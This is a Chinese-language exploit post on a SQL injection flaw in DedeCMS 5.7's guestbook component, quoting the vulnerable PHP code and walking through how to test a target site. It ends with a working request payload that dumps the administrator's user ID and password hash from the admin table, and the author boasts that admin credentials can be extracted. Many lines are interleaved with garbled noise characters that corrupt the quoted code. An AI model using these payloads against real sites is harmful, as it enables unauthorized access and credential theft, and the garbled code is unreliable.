dedecms5.7最新sql注射漏洞利用 guestbook.php

admin

影响版本为5.7

* v+ ?% w- \9 _2 K$ s9 ^漏洞文件edit.inc.php具体代码：
1 T1 r6 M/ Y* o7 S( G5 ?5 P
0 W, Y& Y! ^. I6 `3 P. X< ?php  

if(!defined('DEDEINC')) exit('Request Error!');  

( D5 b* L. _. S   
$ @/ b# `! \. S5 Z! T5 o
if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  
; j* j* J2 g  V4 C' N) ?
else $GUEST_BOOK_POS = "guestbook.php";  
# B6 B5 ~; c/ h7 L
' x; V% h: D0 t   

- Z; D3 X5 B5 l4 m' b; l( {$ ]+ L$id = intval($id);  
9 J4 W5 k- \, a8 G& c# t/ [1 T
3 i" F9 D* t/ w7 pif(empty($job)) $job='view';  

  P) I% r3 u- @, z   

1 {- ]: f5 s2 u: Bif($job=='del' && $g_isadmin)  

{  

8 V3 @4 Z6 n6 w; c# ]$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  
$ Q* P  }% o: \1 a' V: n& T3 t0 I2 W
ShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  
0 P, X5 f& F+ b% Z9 e
exit();  

}  
: o! ]3 A; b; K
else if($job=='check' && $g_isadmin)  
6 g6 |2 D+ q3 [& e7 M
{  

$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  

% m; r4 M) P: [5 {9 vShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  

3 ^- K+ t5 S3 B% V$ b7 E0 sexit();  
8 O' _% G' u8 v
7 [9 o+ b4 M* L( H% z}  

else if($job=='editok')  
" I( {# d! o0 E! U
{  
. r" l" i4 n* G0 c
5 q: Y" N, J* d; s$ }2 d' J. t$remsg = trim($remsg);  

if($remsg!='')  

{  

//管理员回复不过滤HTML By:Errorera blog:errs.cc  

- @, h2 ^7 W1 Gif($g_isadmin)  

: s( S+ Q1 _3 W4 q* K{  

$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  
2 b% _# m' ]; F- V8 n  F
% D0 V0 Q* H0 e. [//$remsg <br /><font color=red>管理员回复：</font> }  
; j. X- {/ U& L
; [( n/ J2 k4 q5 Oelse
) x" I3 D% W9 U, K+ ^- \# ^
{  
; V1 ^. @+ w: _; \0 _
$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  

, I. Y' e: R# \$ ]$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  
$ r$ q: N8 `) _6 P) R/ w$ g
$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  
# `: T  D+ x$ A: X
$msg = $oldmsg.$remsg;  

}  
( V- q. t" J& n# \
}  

& S/ }2 G" D9 ]; @//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  
" \5 ]: {  x/ I* M. m, [' [. z) ?* I
$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  
5 n' \  b3 v' p3 R4 z
ShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  
0 _9 k' N* ^- L/ y' Z
exit();  
% E5 F0 j5 m" f
}  
9 d4 p# m, X+ x) A$ m+ P
//home:www.errs.cc  

if($g_isadmin)  
, m( o) \* f; S% a9 n$ ]# B# [8 e
{  

$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  

/ a9 ^8 N9 P4 W6 hrequire_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  
% _8 ?6 I+ Z  ^3 h
" W" \6 @, i* {) Y# C/ m}  

4 {0 b/ O! D+ V! X/ M$ {/ }else
* _! e, N3 ]! O. s" D: h+ a
6 z' n0 x, `, n5 ?# O+ g{  

$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  

, W" n0 A9 l4 E- I0 c. v" {- @} 漏洞成功需要条件：
3 W5 S2 }1 V7 O" x1. php magic_quotes_gpc=off
6 s% r* _. C+ o& J' j/ Q+ ^: w2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。

怎么判断是否存在漏洞：
先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言，
然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
访问：
2 U4 T8 S' g( k% N- r. {
. P( Q; \; x  _& I8 ~www.xxx.com/plus/guestbook.php?a ... tok&msg=errs.cc存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证
2 J2 N! O: w5 ]7 c8 t! l
5 N6 i$ |8 T, @) ]9 e8 u6 V4 _* \; U8 v
* e9 {/ p0 _% a% k/ _1 W明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
4 B. h9 w7 U( H/ s( [如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
, {2 A1 M1 q. X+ @4 o/ ]5 o那么再次访问
; ~: \, _- l) d6 H3 `( c+ ?; {% J
www.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回，那条留言ID的内容就直接修改成了mysql 的user().

6 w  v- i; Q6 i+ M5 }* d大概利用就是这样，大家有兴趣的多研究下！！
; F  \; f* t- C% j8 D( R9 n
最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！

3 S; I& s; J" n/ S" N4 J/ gview sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='